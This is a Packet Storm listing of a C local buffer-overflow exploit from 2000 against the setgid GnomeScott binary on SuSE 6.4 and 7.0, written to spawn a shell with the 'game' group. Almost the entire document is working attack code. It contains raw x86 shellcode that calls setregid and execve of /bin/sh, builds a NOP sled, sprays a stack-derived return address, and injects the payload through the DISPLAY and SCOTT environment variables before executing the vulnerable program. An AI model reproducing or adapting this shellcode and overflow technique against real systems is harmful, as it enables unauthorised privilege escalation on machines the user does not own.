GnomeScott local buffer overflow which provides a gid=40 (game) shell on SuSE 6.4 and 7.0.
b91af559b80952154115640a2ad71c7a3af251836cff99bde6dad6259ee95e28/* GnomeScott local buffer overflow. (gid=game(40))
*
* Author: Cody Tubbs (loophole of hhp).
* www.hhp-programming.net / pigspigs@yahoo.com
* 12/8/2000
*
* This exploit was coded at overfiens in cali.
* Shouts to overfien and skeptik... h00t h00t.
*
* Tested on SuSE 6.4/2.2.14 and 7.0/2.2.16-SMP
* sgid "game"(40) by default.
*
*/
#include <stdio.h>
#define OFFSET 0
#define NOP 0x90
#define DBUF 256 //184+RET+68 :D
#define GID 40
static char shellcode[]=
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0"
"\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x00\xb1\x00\x31"
"\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
"\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x69";
long get_sp(void){
__asm__("movl %esp,%eax");
}
main(int argc, char **argv){
char eipeip[DBUF], buffer[4096], heh[256+1];
int i, offset, gid;
long address;
if(argc>1){
offset=atoi(argv[1]);
}else{
offset=OFFSET;
}
address=get_sp()-offset;
for(i=0;i<DBUF;i+=4){
*(long *)&eipeip[i]=address;
}
gid=GID;
shellcode[10]=gid;
shellcode[22]=gid;
shellcode[24]=gid;
for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
buffer[i]=NOP;
}
memcpy(heh, eipeip, strlen(eipeip));
memcpy(heh, "DISPLAY=", 8);
putenv(heh);
memcpy(buffer+i, shellcode, strlen(shellcode));
memcpy(buffer, "SCOTT=", 6);
putenv(buffer);
fprintf(stderr, "Return address %#x, offset: %d.\n", address, offset);
execlp("/opt/gnome/bin/GnomeScott", "GnomeScott", 0);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed